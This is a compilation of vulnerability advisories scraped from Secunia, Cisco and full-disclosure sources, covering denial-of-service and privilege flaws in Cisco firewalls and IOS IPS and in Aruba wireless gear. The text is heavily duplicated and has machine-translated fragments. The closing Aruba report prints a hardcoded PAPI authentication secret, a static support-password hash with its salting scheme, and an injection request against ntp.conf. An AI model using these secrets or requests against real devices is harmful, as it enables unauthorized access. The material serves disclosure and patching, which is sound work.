Cisco Firewall Services Module (FWSM) 3.x before 3.1(3.11), when the HTTPS server is enabled, allows remote attackers to cause a denial of service (device reboot) via certain HTTPS traffic. Cisco Firewall Services Module fails to properly inspect SIP messages. This vulnerability may allow a remote attacker to cause a denial of service condition. Multiple Cisco products are prone to multiple denial-of-service vulnerabilities. Attackers can exploit these issues to cause vulnerable devices to reload, potentially causing denial-of-service conditions. Multiple security vulnerabilities exist in Cisco PIX 500 Series Security Appliances and Cisco ASA 5500 Series Adaptive Security Appliances: Enhanced Inspection Malformed HTTP Traffic +--------------------- -------------------------- Cisco PIX and ASA Security Appliances may crash when checking for malformed HTTP requests if Enhanced HTTP Inspection is enabled . If HTTP application inspection is enabled, the configuration will contain a line similar to inspect http, where the name of the specific HTTP mapping. Note that normal HTTP inspection (configured via inspect http, without HTTP mapping) is not affected by this vulnerability. This vulnerability is documented in Cisco Bug ID as CSCsd75794. To trigger this vulnerability, the SIP fixup (for 6.x software) or inspect (for 7.x software) function must be enabled. SIP fixup (in 6.x and earlier) and SIP check (in 7. x and earlier) is enabled by default. This vulnerability is documented in Cisco Bug IDs as CSCsd97077 and CSCse27708. Check malformed TCP packet flow+------------------------------------------- ------ Cisco PIX and ASA equipment may crash when processing malformed packet flow based on TCP protocol. Protocols must be handled through the inspect function. The message may be sent to the device, or it may only pass through the device. Cisco PIX and ASA appliances can inspect the following TCP-based protocols: * Computer Telephony Interface Quick Buffer Encoding (CITQBE) * Distributed Computing Environment/Remote Procedure Call (DCE/RPC) * Domain Name Service (DNS) * Extended Simple Mail Transfer Protocol (ESMTP) * File Transfer Protocol (FTP) * H.323 Protocol * Hypertext Transfer Protocol (HTTP) * Internet Location Server (ILS) * Instant Messaging (IM) * Point-to-Point Tunneling Protocol (PPTP) * Remote Shell (RSH ) * Real Time Streaming Protocol (RTSP) * Session Initiation Protocol (SIP) *... ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. 1) An unspecified error within the enhanced inspection of HTTP traffic can be exploited to cause the device to reload via specially crafted HTTP traffic. Successful exploitation requires that enhanced inspection is enabled. 2) An error within the inspection of SIP packets can be exploited to cause the device to reload via specially crafted SIP packets. Successful exploitation requires that SIP inspection is enabled. 3) An unspecified error when processing malformed HTTPS requests can be exploited to cause the device to reload by sending specially crafted HTTPS requests. Successful exploitation requires that "authentication for network access" (auth-proxy) is enabled. 4) An error when processing HTTP requests with a very long URL can be exploited to cause the device to reload, but requires that "authentication for network access" (auth-proxy) is enabled. 5) An unspecified error exists when processing HTTPS traffic that is directed to the FWSM. 6) An unspecified error when processing malformed SNMP requests from a trusted device can be exploited to cause the affected device to reload. Successful exploitation requires that the other, trusted device has explicit SNMP poll access. 7) A security issue when manipulating ACLs (Access Control Lists) that make use of object groups can corrupt ACLs, resulting in ACEs (Access Control Entries) being skipped or not evaluated in order, which can be exploited to bypass certain security restrictions. Note: Only an administrative user can change ACLs. Additionally, this does not affected devices which are reloaded after ACLs have been manipulated. A vulnerability that could cause the device to reload when "debugging" is enabled has also been reported. SOLUTION: Apply updated software. Please see vendor advisory for a patch matrix. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cisco PIX 500 and ASA 5500 Series Security Appliances 7.2.2, when configured to inspect certain TCP-based protocols, allows remote attackers to cause a denial of service (device reboot) via malformed TCP packets. Cisco Firewall Services Module fails to properly inspect SIP messages. This vulnerability may allow a remote attacker to cause a denial of service condition. According to Cisco Systems information TCP base The protocol inspection feature is enabled by default.Crafted by a third party TCP Device processing disruption by processing packets (DoS) It may be in a state. Cisco PIX and ASA are prone to a privilege-escalation vulnerability. Exploiting this issue allows authenticated attackers to gain administrative privileges on affected computers. This may facilitate the complete compromise of the affected device. This issue is tracked by Cisco Bug ID: CSCsh33287. Multiple Cisco products are prone to multiple denial-of-service vulnerabilities. Attackers can exploit these issues to cause vulnerable devices to reload, potentially causing denial-of-service conditions. Protocols must be handled through the inspect function. The message may be sent to the device, or it may only pass through the device. Cisco PIX and ASA appliances can inspect the following TCP-based protocols: * Computer Telephony Interface Quick Buffer Encoding (CITQBE) * Distributed Computing Environment/Remote Procedure Call (DCE/RPC) * Domain Name Service (DNS) * Extended Simple Mail Transfer Protocol (ESMTP) * File Transfer Protocol (FTP) * H.323 Protocol * Hypertext Transfer Protocol (HTTP) * Internet Location Server (ILS) * Instant Messaging (IM) * Point-to-Point Tunneling Protocol (PPTP) * Remote Shell (RSH ) * Real Time Streaming Protocol (RTSP) * Session Initiation Protocol (SIP) * Small (or Simple) Client Control Protocol (SCCP) * Simple Mail Transfer Protocol (SMTP) * Oracle SQL*Net * Sun RPC. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: Cisco PIX and ASA Privilege Escalation and Denial of Service SECUNIA ADVISORY ID: SA24160 VERIFY ADVISORY: http://secunia.com/advisories/24160/ CRITICAL: Moderately critical IMPACT: Privilege escalation, DoS WHERE: >From remote OPERATING SYSTEM: Cisco PIX 7.x http://secunia.com/product/6102/ Cisco Adaptive Security Appliance (ASA) 7.x http://secunia.com/product/6115/ DESCRIPTION: Some vulnerabilities have been reported in Cisco PIX and ASA, which can be exploited by malicious users to gain escalated privileges and by malicious people to cause a DoS (Denial of Service). 1) An unspecified error exists within the enhanced HTTP inspection feature. This can be exploited to crash the device via malformed HTTP requests, but requires that enhanced HTTP inspection is enabled. 2) An unspecified error exists within the SIP packet inspection. This can be exploited to crash the device by sending specially crafted SIP packets, but requires that "inspect" is enabled (it is disabled by default). 3) An unspecified error exists within the TCP-based protocol inspection. This can be exploited to crash the device via malformed packets, but requires that inspection of TCP-based protocols (e.g. FTP or HTTP) is enabled. 4) An unspecified error within the "LOCAL" authentication method can be exploited to gain escalated privileges. Successful exploitation allows gaining privilege level 15 and changing the complete configuration of the device, but requires that the attacker can authenticate to the device and that he is defined in the local database with privilege level 0. SOLUTION: Apply updated versions. See the vendor advisory for a patch matrix. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cisco PIX 500 and ASA 5500 Series Security Appliances 7.0 before 7.0(4.14) and 7.1 before 7.1(2.1), and the FWSM 2.x before 2.3(4.12) and 3.x before 3.1(3.24), when "inspect http" is enabled, allows remote attackers to cause a denial of service (device reboot) via malformed HTTP traffic. According to Cisco Systems information, advanced HTTP The inspection function is disabled by default and is "inspect http" (HTTP Inspection ) Has been reported to be unaffected.Crafted by a third party HTTP Processing the request causes the device to interfere with service operation (DoS) It may be in a state. Cisco PIX and ASA are prone to a privilege-escalation vulnerability. Exploiting this issue allows authenticated attackers to gain administrative privileges on affected computers. This may facilitate the complete compromise of the affected device. This issue is tracked by Cisco Bug ID: CSCsh33287. The Cisco PIX/ASA and Firewall Services Module (FWSM) provide firewall services with stateful packet filtering and deep packet inspection. Note that normal HTTP inspection (configured via inspect http, without HTTP mapping) is not affected by this vulnerability. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: Cisco PIX and ASA Privilege Escalation and Denial of Service SECUNIA ADVISORY ID: SA24160 VERIFY ADVISORY: http://secunia.com/advisories/24160/ CRITICAL: Moderately critical IMPACT: Privilege escalation, DoS WHERE: >From remote OPERATING SYSTEM: Cisco PIX 7.x http://secunia.com/product/6102/ Cisco Adaptive Security Appliance (ASA) 7.x http://secunia.com/product/6115/ DESCRIPTION: Some vulnerabilities have been reported in Cisco PIX and ASA, which can be exploited by malicious users to gain escalated privileges and by malicious people to cause a DoS (Denial of Service). 1) An unspecified error exists within the enhanced HTTP inspection feature. This can be exploited to crash the device via malformed HTTP requests, but requires that enhanced HTTP inspection is enabled. 2) An unspecified error exists within the SIP packet inspection. This can be exploited to crash the device by sending specially crafted SIP packets, but requires that "inspect" is enabled (it is disabled by default). 3) An unspecified error exists within the TCP-based protocol inspection. This can be exploited to crash the device via malformed packets, but requires that inspection of TCP-based protocols (e.g. FTP or HTTP) is enabled. 4) An unspecified error within the "LOCAL" authentication method can be exploited to gain escalated privileges. Successful exploitation allows gaining privilege level 15 and changing the complete configuration of the device, but requires that the attacker can authenticate to the device and that he is defined in the local database with privilege level 0. SOLUTION: Apply updated versions. See the vendor advisory for a patch matrix. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Successful exploitation requires that "SIP fixup" is enabled, which is the default setting. 2) A security issue when manipulating ACLs (Access Control Lists) that make use of object groups can corrupt ACLs, resulting in ACEs (Access Control Entries) being skipped or not evaluated in order, which can be exploited to bypass certain security restrictions. Note: Only an administrative user can change ACLs. Additionally, this does not affected devices which are reloaded after ACLs have been manipulated

Cisco PIX 500 and ASA 5500 Series Security Appliances 6.x before 6.3(5.115), 7.0 before 7.0(5.2), and 7.1 before 7.1(2.5), and the FWSM 3.x before 3.1(3.24), when the "inspect sip" option is enabled, allows remote attackers to cause a denial of service (device reboot) via malformed SIP packets. Cisco Firewall Services Module fails to properly inspect SIP messages. This vulnerability may allow a remote attacker to cause a denial of service condition. According to information from Cisco Systems, SIP The inspection function is activated by default.Crafted by a third party SIP Device processing disruption by processing packets (DoS) It may be in a state. Cisco PIX and ASA are prone to a privilege-escalation vulnerability. Exploiting this issue allows authenticated attackers to gain administrative privileges on affected computers. This may facilitate the complete compromise of the affected device. This issue is tracked by Cisco Bug ID: CSCsh33287. Note that normal HTTP inspection (configured via inspect http, without HTTP mapping) is not affected by this vulnerability. To trigger this vulnerability, the SIP fixup (for 6.x software) or inspect (for 7.x software) function must be enabled. SIP fixup (in 6.x and earlier) and SIP check (in 7. x and earlier) is enabled by default. Check malformed TCP packet flow+------------------------------------------- ------ Cisco PIX and ASA equipment may crash when processing malformed packet flow based on TCP protocol. Protocols must be handled through the inspect function. The message may be sent to the device, or it may only pass through the device. Cisco PIX and ASA appliances can inspect the following TCP-based protocols: * Computer Telephony Interface Quick Buffer Encoding (CITQBE) * Distributed Computing Environment/Remote Procedure Call (DCE/RPC) * Domain Name Service (DNS) * Extended Simple Mail Transfer Protocol (ESMTP) * File Transfer Protocol (FTP) * H.323 Protocol * Hypertext Transfer Protocol (HTTP) * Internet Location Server (ILS) * Instant Messaging (IM) * Point-to-Point Tunneling Protocol (PPTP) * Remote Shell (RSH ) * Real Time Streaming Protocol (RTSP) * Session Initiation Protocol (SIP) *... ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: Cisco PIX and ASA Privilege Escalation and Denial of Service SECUNIA ADVISORY ID: SA24160 VERIFY ADVISORY: http://secunia.com/advisories/24160/ CRITICAL: Moderately critical IMPACT: Privilege escalation, DoS WHERE: >From remote OPERATING SYSTEM: Cisco PIX 7.x http://secunia.com/product/6102/ Cisco Adaptive Security Appliance (ASA) 7.x http://secunia.com/product/6115/ DESCRIPTION: Some vulnerabilities have been reported in Cisco PIX and ASA, which can be exploited by malicious users to gain escalated privileges and by malicious people to cause a DoS (Denial of Service). 1) An unspecified error exists within the enhanced HTTP inspection feature. This can be exploited to crash the device via malformed HTTP requests, but requires that enhanced HTTP inspection is enabled. 2) An unspecified error exists within the SIP packet inspection. This can be exploited to crash the device by sending specially crafted SIP packets, but requires that "inspect" is enabled (it is disabled by default). 3) An unspecified error exists within the TCP-based protocol inspection. This can be exploited to crash the device via malformed packets, but requires that inspection of TCP-based protocols (e.g. FTP or HTTP) is enabled. 4) An unspecified error within the "LOCAL" authentication method can be exploited to gain escalated privileges. Successful exploitation allows gaining privilege level 15 and changing the complete configuration of the device, but requires that the attacker can authenticate to the device and that he is defined in the local database with privilege level 0. SOLUTION: Apply updated versions. See the vendor advisory for a patch matrix. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Successful exploitation requires that "SIP fixup" is enabled, which is the default setting. 2) A security issue when manipulating ACLs (Access Control Lists) that make use of object groups can corrupt ACLs, resulting in ACEs (Access Control Entries) being skipped or not evaluated in order, which can be exploited to bypass certain security restrictions. Note: Only an administrative user can change ACLs. Additionally, this does not affected devices which are reloaded after ACLs have been manipulated

Heap-based buffer overflow in the management interfaces in (1) Aruba Mobility Controllers 200, 800, 2400, and 6000 and (2) Alcatel-Lucent OmniAccess Wireless 43xx and 6000 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via long credential strings. The Aruba Mobility Controller Management Interface contains a buffer overflow. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable system. Aruba Mobility Controller is prone to multiple vulnerabilities that may lead to authentication bypass, remote code execution, denial-of-service conditions. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. 2) An error in the guest account authentication process within the Captive Portal can be exploited to e.g. gain access to administrative sections without specifying a password. SOLUTION: Update to the latest patched firmware version. https://support.arubanetworks.com PROVIDED AND/OR DISCOVERED BY: John Munther and Maxim Salomon, n.runs AG ORIGINAL ADVISORY: http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052382.html http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052380.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The Intrusion Prevention System (IPS) feature for Cisco IOS 12.4XE to 12.3T allows remote attackers to bypass IPS signatures that use regular expressions via fragmented packets. Cisco IOS is prone to a security-bypass vulnerability and a denial-of-service vulnerability. An attacker could exploit the security-bypass issue to send malicious data to computers that would otherwise be protected by signature inspection. An attacker could exploit the denial-of-service vulnerability to crash affected devices, denying service to legitimate users. Several vulnerabilities exist in the IOS IPS function, and only IOS images that include the IPS function are affected by these vulnerabilities. All IP protocols (such as TCP, UDP, ICMP) are affected by this vulnerability. ATOMIC.TCP Regular Expression Denial of Service Vulnerability+------------------------------------------- -------------------- Certain network communications may trigger IPS signatures using the regular expression capabilities of the ATOMIC.TCP signature engine, resulting in denial of service and interruption of network communications. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: Cisco IOS IPS Security Bypass and Denial of Service SECUNIA ADVISORY ID: SA24142 VERIFY ADVISORY: http://secunia.com/advisories/24142/ CRITICAL: Moderately critical IMPACT: Security Bypass, DoS WHERE: >From remote OPERATING SYSTEM: Cisco IOS R12.x http://secunia.com/product/50/ Cisco IOS 12.x http://secunia.com/product/182/ DESCRIPTION: Two vulnerabilities have been reported in Cisco IOS, which can be exploited by malicious people to bypass certain security restrictions or cause a DoS (Denial of Service). This can be exploited to bypass the detection mechanism by sending specially crafted, fragmented IP packets. 2) An error exists within the ATOMIC.TCP scanning mechanism and signatures, which use regular expressions (e.g. Signature 3123.0 for Netbus Pro Traffic). This can be exploited to crash a device by producing specially crafted network traffic. SOLUTION: See the vendor advisory for a patch matrix and workarounds. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20070213-iosips.shtml http://www.cisco.com/en/US/products/products_security_response09186a00807e0a5e.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The ATOMIC.TCP signature engine in the Intrusion Prevention System (IPS) feature for Cisco IOS 12.4XA, 12.3YA, 12.3T, and other trains allows remote attackers to cause a denial of service (IPS crash and traffic loss) via unspecified manipulations that are not properly handled by the regular expression feature, as demonstrated using the 3123.0 (Netbus Pro Traffic) signature. Cisco IOS is prone to a security-bypass vulnerability and a denial-of-service vulnerability. An attacker could exploit the security-bypass issue to send malicious data to computers that would otherwise be protected by signature inspection. An attacker could exploit the denial-of-service vulnerability to crash affected devices, denying service to legitimate users. Cisco IOS is the operating system used by Cisco networking devices, and Cisco IOS Intrusion Prevention System (IPS) is a built-in deep packet inspection feature that allows Cisco IOS software to mitigate network attacks. Several vulnerabilities exist in the IOS IPS function, and only IOS images that include the IPS function are affected by these vulnerabilities. Fragmented packet evasion detection vulnerability + -------------------------------------- Some IPS features use regular expression. All IP protocols (such as TCP, UDP, ICMP) are affected by this vulnerability. ATOMIC.TCP Regular Expression Denial of Service Vulnerability+------------------------------------------- -------------------- Certain network communications may trigger IPS signatures using the regular expression capabilities of the ATOMIC.TCP signature engine, resulting in denial of service and interruption of network communications. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: Cisco IOS IPS Security Bypass and Denial of Service SECUNIA ADVISORY ID: SA24142 VERIFY ADVISORY: http://secunia.com/advisories/24142/ CRITICAL: Moderately critical IMPACT: Security Bypass, DoS WHERE: >From remote OPERATING SYSTEM: Cisco IOS R12.x http://secunia.com/product/50/ Cisco IOS 12.x http://secunia.com/product/182/ DESCRIPTION: Two vulnerabilities have been reported in Cisco IOS, which can be exploited by malicious people to bypass certain security restrictions or cause a DoS (Denial of Service). 1) Cisco IOS IPS signatures using regular expressions may not correctly identify malicious traffic within fragmented IP packets. This can be exploited to bypass the detection mechanism by sending specially crafted, fragmented IP packets. 2) An error exists within the ATOMIC.TCP scanning mechanism and signatures, which use regular expressions (e.g. Signature 3123.0 for Netbus Pro Traffic). This can be exploited to crash a device by producing specially crafted network traffic. SOLUTION: See the vendor advisory for a patch matrix and workarounds. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20070213-iosips.shtml http://www.cisco.com/en/US/products/products_security_response09186a00807e0a5e.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The (1) Aruba Mobility Controllers 200, 600, 2400, and 6000 and (2) Alcatel-Lucent OmniAccess Wireless 43xx and 6000 do not properly implement authentication and privilege assignment for the guest account, which allows remote attackers to access administrative interfaces or the WLAN. The Aruba Mobility Controller Management Interface contains a buffer overflow. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable system. Aruba Mobility Controller is prone to multiple vulnerabilities that may lead to authentication bypass, remote code execution, denial-of-service conditions. Aruba ArubaOS/Aruba Instant/AirWave Management - Multiple Vulnerabilities ------------------------------------------------------------------------- Introduction ============ Multiple vulnerabilities were identified in Aruba AP, IAP and AMP devices. The Vulnerabilities were discovered during a black box security assessment and therefore the vulnerability list should not be considered exhaustive. Several of the high severity vulnerabilities listed in this report are related to the Aruba proprietary PAPI protocol and allow remote compromise of affected devices. Affected Software And Versions ============================== - ArubaOS (all versions) - AirWave Management Platform 8.x prior to 8.2 - Aruba Instant (all versions up to, but not including, 4.1.3.0 and 4.2.3.1) CVE === The following CVE were assigned to the issues described in this report: - CVE-2016-2031 - CVE-2016-2032 Vulnerability Overview ====================== 1. AMP: RabbitMQ Management interface exposed 2. AMP: XSRF token uses weak calculation algorithm 3. AMP: Arbitrary modification of /etc/ntp.conf 4. AMP: PAPI uses static key for calculating validation checksum (auth bypass) 5. (I)AP: Insecure transmission of login credentials (GET) 6. (I)AP: Built in privileged "support" account 7. (I)AP: Static password hash for support account 8. (I)AP: Unusual account identified ("arubasecretadmin") 9. (I)AP: Privileged remote code execution 10. (I)AP: Radius passwords allow arbitrary raddb commands 11. (I)AP: Unauthenticated disclosure of environment variables 12. (I)AP: Information disclosure by firmware checking functionality 13. (I)AP: Unauthenticated automated firmware update requests 14. (I)AP: Firmware updater does not check certificates 15. (I)AP: Forceful downgrade of FW versions possible 16. (I)AP: Firmware update check discloses machine certificate 17. (I)AP: Firmware is downloaded via unencrypted connection 18. (I)AP: Firmware update Challenge/Response does not protect the Client 19. (I)AP: Unencrypted private keys and certs 20. (I)AP: Potential signature private key 21. (I)AP: PAPI Endpoints exposed to all interfaces 22. (I)AP: PAPI Endpoint does not validate MD5 signatures 23. (I)AP: PAPI protocol encrypted with weak encryption algorithm 24. (I)AP: PAPI protocol authentication bypass 25. (I)AP: Broadcast with detailed system information (LLDP) 26. (I)AP: User passwords are encrypted with a static key Vulnerability Details ===================== --------------------------------------------- 1. AMP: RabbitMQ Management interface exposed --------------------------------------------- AMPs expose the management frontend for the RabbitMQ message queue on all interfaces via tcp/15672 and tcp/55672. # netstat -nltp | grep beam tcp 0 0 127.0.0.1:5672 0.0.0.0:* LISTEN 2830/beam.smp tcp 0 0 127.0.0.1:17716 0.0.0.0:* LISTEN 2830/beam.smp tcp 0 0 0.0.0.0:15672 0.0.0.0:* LISTEN 2830/beam.smp tcp 0 0 0.0.0.0:55672 0.0.0.0:* LISTEN 2830/beam.smp The password for the default user "airwave" is stored in the world readable file /etc/rabbitmq/rabbitmq.config in plaintext: # ls -l /etc/rabbitmq/rabbitmq.config -rw-r--r-- 1 root root 275 Oct 28 15:48 /etc/rabbitmq/rabbitmq.config # grep default_ /etc/rabbitmq/rabbitmq.config {default_user,<<"airwave">>}, {default_pass,<<"***REMOVED***">>} -------------------------------------------------- 2. AMP: XSRF token uses weak calculation algorithm -------------------------------------------------- The XSRF token is calculated based on limited sources of entropy, consisting of the user's time of login and a random number between 0 and 99999. The algorithm Is approximated by the following example Python script: base64.b64encode(hashlib.md5('%d%5.5d' % (int(time.time()), random.randint(0,99999))).digest()) ----------------------------------------------- 3. AMP: Arbitrary modification of /etc/ntp.conf ----------------------------------------------- Incorrect/missing filtering of input parameters allows injecting new lines and arbitrary commands into /etc/ntp.conf, when updating the NTP settings via the web frontend. POST /nf/pref_network? HTTP/1.1 Host: 192.168.131.162 [...] id=&ip_1=192.168.131.162&hostname_1=foo.example.com& subnet_mask_1=255.255.255.248&gateway_1=192.168.131.161&dns1_1=172.16.255.1& dns2_1=&eth1_enabled_1=0&eth1_ip_1=&eth1_netmask_1=& ntp1_1=time1.example.com%0afoo&ntp2_1=time2.example.com&save=Save The above POST requests results in the following ntp.conf being generated: # cat /etc/ntp.conf [...] server time1.example.com foo server time2.example.com ------------------------------------------------------------------------------ 4. AMP: PAPI uses static key for calculating validation checksum (auth bypass) ------------------------------------------------------------------------------ PAPI packets sent from an AP to an AMP are authenticated with a cryptographic checksum. The packet format is only partially known, as it's a proprietary format created by Aruba. A typical PAPI packet sent to an AMP is as follows: 0000 49 72 00 02 64 69 86 2d 7f 00 00 01 01 00 01 00 Ir..di.-........ 0010 20 1f 20 1e 00 01 00 00 00 01 3e f9 22 49 05 b3 . .......>."I.. 0020 50 89 40 d3 5d 9d d6 af 46 98 c1 a6 P.@.]...F... The following dissection of the above shown packet gives a more detailed overview of the format: 49 72 ID 00 02 Version 64 69 86 2d PAPI Destination IP 7f 00 00 01 PAPI Source IP 01 00 Unknown1 01 00 Unknown2 20 1f PAPI Source Port 20 1e PAPI Destination Port 00 01 Unknown3 00 00 Unknown4 00 01 Sequence Number 3e f9 Unknown5 22 49 05 b3 50 89 40 d3 5d 9d d6 af 46 98 c1 a6 Checksum The checksum is based on a MD5 hash of a padded concatenation of all fields and a secret token. The secret token is hardcoded in multiple binaries on the AMP and can easily be retrieved via core Linux system tools: $ strings /opt/airwave/bin/msgHandler | grep asd asdf;lkj763 Using this secret token it is possible to craft valid PAPI packets and issue commands to the AMP, bypassing the authentication based on the shared secret / token. This can be exploited to compromise of the device. Random sampling of different software versions available on Aruba's website confirmed that the shared secret is identical for all versions. ------------------------------------------------------- 5. AP: Insecure transmission of login credentials (GET) ------------------------------------------------------- Username and password to authenticate with the AP web frontend are transmitted through HTTP GET. This method should not be used in a form that transmits sensitive data, because the data is displayed in clear text in the URL. GET /swarm.cgi?opcode=login&user=admin&passwd=admin HTTP/1.1 The login URL can potentially appear in Proxy logs, the server logs or browser history. This possibly discloses the authentication data to unauthorized persons. -------------------------------------------- 6. AP: Built in privileged "support" account -------------------------------------------- The APs provide a built in system account called "support". When connected to the restricted shell of the AP via SSH, issuing the command "support", triggers a password request: 00:0b:86:XX:XX:XX# support Password: A quick internet search clarified, that this password is meant for use by Aruba engineers only: http://community.arubanetworks.com/t5/Unified-Wired-Wireless-Access/OS5-0-support-password/td-p/26760 Further research on that functionality lead to the conclusion that this functionality provides root-privileged shell access to the underlying operating system of the AP, given the correct password is entered. ----------------------------------------------- 7. AP: Static password hash for support account ----------------------------------------------- The password hash for the "support" account mentioned in vulnerability #6 is stored in plaintext on the AP. $ strings /aruba/bin/cli | grep ^bc5 bc54907601c92efc0875233e121fd3f1cebb8b95e2e3c44c14 Random sampling of different versions of Firmware images available on Aruba's website confirmed that the password hash is identical for all versions. The password check validating a given "support" password is based on the following algorithm: SALT + sha1(SALT + PASSWORD) Where SALT equals the first 5 bytes of the password hash in binary representation. It is possible to run a brute-force attack on this hash format using JtR with the following input format: 